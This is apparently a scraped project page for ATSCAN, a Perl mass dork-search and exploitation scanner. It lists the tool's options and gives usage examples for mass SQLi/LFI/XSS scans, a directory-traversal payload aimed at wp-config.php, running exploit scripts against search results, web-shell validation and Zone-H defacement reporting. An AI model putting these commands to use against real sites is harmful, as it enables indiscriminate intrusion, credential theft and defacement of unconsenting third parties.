ATSCAN SCANNER

Name: AlisamTechnology/ATSCAN
Brand: AlisamTechnology/ATSCAN
SKU: project/AlisamTechnology/ATSCAN
Rating: 4.85 (1178 reviews)

Advanced Mass Search / Dork / Exploitation Scanner

Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent! It is your responsibility to obey laws!

Codename:	4n0n4t
AUTHOR:	Ali MEHDIOUI
GROUP:	[email protected]

★ Description:

● Engines: [Google apis cache] Bing Ask Yandex Sogou Exalead Shodan
● Mass Dork Search
● Multiple instant scans.
● Mass Exploitation
● Use proxy.
● Random user agent.
● Random engine.
● Mass Extern commands execution.
● Exploits and issues search.
● XSS / SQLI / LFI / AFD scanner.
● Filter wordpress & Joomla sites.
● Wordpress theme and plugin detection.
● Find Admin page.
● Decode / Encode Base64 / MD5

● Ports scan.
● Collect IPs
● Collect E-mails.
● Auto detect errors.
● Auto detect forms.
● Auto detect Cms.
● Post data.
● Auto sequence repeater.
● Validation.
● Post and Get method
● IP Localisation
● Issues and Exploit search
● Interactive and Normal interface.
● And more...

★ Libreries to install:

Perl Required.
Works in all platforms. Disponible in Blackarch and Dracos Linux.

★ Download:

● git clone https://github.com/AlisamTechnology/ATSCAN
● direct link: https://github.com/AlisamTechnology/ATSCAN

★ Permissions:

cd ATSCAN
chmod +x ./atscan.pl

★ Installation:

chmod +x ./install.sh
./install.sh

★ Execution:

Portable Execution: perl ./atscan.pl
Installed Tool Execution: atscan
Menu: Applications > Web Application analysis > atscan

★ Repair Tool:

atscan --repair

★ Uninstall Tool:

atscan --uninstall

★ Commands:

--help / -h	Help.
--proxy	Set tor proxy for scans [EX: --proxy "socks4://localhost:9050"] Set proxy [EX: --proxy "http://12.45.44.2:8080"] Set proxy list [EX: --proxy file]
--prandom	Random proxy [EX: --prandom file] or --prandom "socks://localhost:9050"]
--motor / -m	bing google ask yandex sogou exalead googleapis googlecache or all
--apikey	Apikey
--cx	Googleapis ID
--mrandom	Random of given engines
--brandom	Random all disponibles agents
--freq	Random time frequency (in seconds)
--time	set browser time out
--dork / -d	Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
--target / -t	Target
--level / -l	Scan level (Number of results pages to scan)
--zone	Search engine country.
--param / -p	Set test parameter EX:id,cat,product_ID
--save / -s	Output.
--source	Html output file
--bugtraq	Serach exploits and issues
--content	Print request content
--data	Post and Get forms. See examples
--vshell	Validate by url ex: --HOST/shell.php or file
--post	Use post method
--get	Use get method
--header	Set headers
--fullHeaders	Print full request headers
--host	Domain name [Ex: site.com]
--nobanner	Hide tool banner
--beep	Produce beep sound if positive scan found.
--ifend	Produce beep sound when scan process is finished.
--noverbose	No scan verbose.
--ping	Host ping.
--limit	Limit max positive scan results.
--valid / -v	Validate by string at least 1 is matching
--validAll	Validate all given strings
--status	Validate by http header status
--server	Validate by server
--ifinurl	Get targets with exact string matching
--sregex	Get targets with exact regex matching
--exclude	Get targets where strings do not exist in html
--excludeAll	Get targets where all strings do not exist in html
--unique	Get targets with exact dork matching
--replace	Replace exact string
--replaceFROM	Replace from string to the end of target
--exp / -e	Exploit/Payload will be added to full target
--expHost	Exploit will be added to the host
--expIp	Exploit will be added to the host ip
--xss	Xss scan
--sql	Sqli scan
--lfi	Local file inclusion
--joomrfi	Scan for joomla local file inclusion.
--shell	Shell link [Ex: http://www.site.com/shell.txt]
--wpafd	Scan wordpress sites for arbitrary file download
--admin	Get site admin page
--shost	Get site subdomains
--port	port
--tcp	TCP port
--udp	UDP port
--getlinks	Get target html links
--wp	Wordpress site
--joom	Joomla site
--zip	Get zip files
--md5	Convert to md5
--encode64	Encode base64 string
--decode64	decode base64 string
--TARGET	Will be replaced by target in extern command
--HOST	Will be replaced by host in extern command
--HOSTIP	Will be replaced by host IP in extern command
--PORT	Will be replaced by open port in extern command
--ips	Collect Ips
--geoloc	Ip geolocalisation
--regex	Crawl to get strings matching regex
--noquery	Remove string value from Query url [ex: site.com/index.php?id=string]
--command / -c	Extern Command to execute
--popup	Execute Extern Command in new terminal window
--zoneH	Upload to Zone-H
--saveCookie	Cookies output file
--setCookies	Cookie file
--email	Collect emails
rang(x-y)	EX: --expHost "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql site.com/index.php?id=1 -> 9.
repeat(txt-y)	EX: --expHost "/index.php?id=repeat(../-9)wp-config.php" --status 200 OR -t "site.com/index.php?id=../wp-config.php" In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
[OTHER]	To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
--googleapi	Google Apis
--shodan	Shodan search
--count	Search Shodan without Results
--count	Search Shodan
--dnsreverset	Shodan Reverse DNS Lookup
--dnsresolve	Shodan Resolve DNS Lookup
--tokens	String filters and parameters
--querysearch	Search the directory of saved Shodan search queries
--query	List the saved Shodan search queries
--querytags	List the most popular Shodan tags
--myip	List all services that Shodan crawls
--services	List all services that Shodan crawls
--apinfo	My Shodan API Plan Information
--ports	List of port numbers that the crawlers are looking for
--protocols	List all protocols that can be used when performing on-demand Internet scans via Shodan.
--honeyscore	Calculates honeypot score ranging from 0 (not a honeypot) to 1.0 (is a honeypot) in shodan
--facets	Shodan search facets
--update	Update tool
--repair	Repair or force tool update.
--tool / -?	Tool info.
--config	User configuration.
--interactive / -i	Interactive mode interface.
--uninstall	Uninstall Tool.

★ Examples:

● PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] Ex: http://12.32.1.5:8080
or --proxy file Ex: --proxy my_proxies.txt

● RANDOM:
Random proxy: --prandom [proxy file]
Random browser: --brandom
Random engine: --mrandom [ENGINES]

● SET HEADERS:
atscan --dork [dork / dorks.txt] --level [level] --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"
atscan -t target --data "name=>username, email=>xxxxxx, pass=>xxxxx" --post --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"

● SEARCH ENGINE:
Search: atscan --dork [dork] --level [level]
Search: atscan -d [dork] -l [level] --getlinks
Set engine: atscan --dork [dork] --level [level] -m bing or google,ask,yandex or all
Set selective engines: atscan -d [dork] -l [level] -m google,bing,..
Search with many dorks: atscan --dork dork1 [OTHER]dork2 [OTHER]dork3] --level [level]
Get Server wordpress sites: atscan -t [target] --wp
Search + output: atscan --dork [dorks.txt] --level [level] --save
Search + get emails: atscan -d [dorks.txt] -l [level] --email
Search + get site emails: atscan --dork site:site.com --level [level] --email
Search + get ips: atscan --dork [dork] --level [level] --ips

● REGULAR EXPRESSIONS:
Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9][email protected]((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'

● REPEATER:
atscan -t site.com?index.php?id=rang(1-10) --sql
atscan -t [target] --expHost "/index.php?id=rang(1-10)" --sql
atscan -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php"

● PORTS
atscan -t [ip] --port [port] [--udp / --tcp]
atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp]
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"

● ENCODE / DECODE:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

● DATA:
Data: atscan -t [target] --data "field1=>value1, field2=>value2, field3=>value3" [--post / --get /]
Exploit: --exp/expHost --data "field1=>value1, field2=>value2, field3=>value3" --vshell [shell path] -v [string] / --status [code] [--post / --get / --upload]
Wordlist: --data "field1=>value1, field2=>WORDLIST:" --vshell [shell path] -v [string] / --status [code] [--post / --get]

● EXTERNAL COMMANDS:
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"
atscan --dork [dork / dorks.txt] --level [level] --command "file"
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"
atscan -d "index of /lib/scripts/dl-skin.php" -l 2 -m bing --command "php WP-dl-skin.php-exploit.php --TARGET"
atscan --shodan --search [string] --apikey [API KEY] -command [extern_command]

● MULTIPLE SCANS:
atscan --dork [dork> --level [10] --sql --lfi --wp ..
atscan --dork [dork> --level [10] --replace [string => new_string] --exp/expHost [payload] [--sql / --lfi / --wp /...]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]
atscan -t [target] [--sql / --lfi / --wp /...]

● IP LOCALISATION:
atscan -t [ip/target] --geoloc

● SEARCH VALIDATION:
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]
atscan -d [dork / dorks.txt] -l [level] --status [code] / --exclude [string/file]
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]
atscan -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --unique
atscan -t [target / targets.txt] [--status [code] / --valid [string]
atscan -t [target / targets.txt] --vshell [file path]
atscan -d [dork / dorks.txt] -l [level] --exp/expHost [payload] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replaceFROM [string => new_string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --exp/expHost [payload] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string]
atscan -t [target / targets.txt] --valid [string] --exclude [string]

● ZONE-H:
atscan -t [target / targets.txt] -v [string] --zoneH "notifier => --HOST/index.php"

● SEARCH EXPLOITS:
atscan --bugtraq -d [string] -l 1 EX: atscan --bugtraq -d wordpress -l 1
atscan --bugtraq -d file.txt -l 1
atscan --bugtraq -d [string] -l 1--limit 10

● GOOGLEAPIS SEARCH
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] -v [string]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] --exp [exploit]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] [ANY APTION]

● SHODAN SEARCH
atscan --shodan --targget [ip or host or file] --apikey [API KEY]
atscan --shodan --dork [string or file] --apikey [API KEY]
atscan --shodan --dnsresolve [ip or host or file] --apikey [API KEY]
atscan --shodan --dnsrevese [ip or host or file] --apikey [API KEY]
atscan --shodan --count [query or file] --apikey [API KEY]
atscan --shodan --query --apikey [API KEY]
atscan --shodan --querysearch [query or file] --apikey [API KEY]
atscan --shodan --querytags --apikey [API KEY]
atscan --shodan --myip --apikey [API KEY]
atscan --shodan --apinfo --apikey [API KEY]
atscan --shodan --services --apikey [API KEY]
atscan --shodan --ports --apikey [API KEY]
atscan --shodan --tokens [string or file] --apikey [API KEY]

● UPDATE TOOL:
atscan --update

● UNINSTALL TOOL:
atscan --uninstall

● THANKS TO:
Blackarch linux & Dragos Os developers to incorporate my project in their systems.

Project Name	Stars	Most Recent Commit	Open Issues	License	Language
Routersploit	10,982	8 months ago	98	other	Python
Exploitation Framework for Embedded Devices
Fsociety	8,564	16 days ago	43	mit	Python
fsociety Hacking Tools Pack – A Penetration Testing Framework
Nuclei Templates	6,434	4 hours ago	165	mit
Community curated list of templates for the nuclei engine to find security vulnerabilities.
Yakit	5,205	9 hours ago	216	agpl-3.0	TypeScript
Cyber Security ALL-IN-ONE Platform
K8tools	5,130	4 days ago	5	mit	PowerShell
K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetNuke/zabbix)
Poc In Github	5,048	6 hours ago	9
📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.
Ladon	3,981	4 days ago	31	mit	PowerShell
Ladon大型内网渗透工具，可PowerShell模块化、可CS插件化、可内存加载，无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描等。10.10.6内置230个功能模块,网络资产探测模块32个通过多种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息，高危漏洞检测16个含MS17010、Zimbra、Exchange
Xunfeng	2,946	2 years ago	67	gpl-3.0	Python
巡风是一款适用于企业内网的漏洞快速应急，巡航扫描系统。
Vulmap	2,935	a month ago	28	gpl-3.0	Python
Vulmap 是一款 web 漏洞扫描和验证工具, 可对 webapps 进行漏洞扫描, 并且具备漏洞验证功能
Vulscan	2,908	a month ago	7	other	Lua
Advanced vulnerability scanning with Nmap NSE

Atscan

ATSCAN SCANNER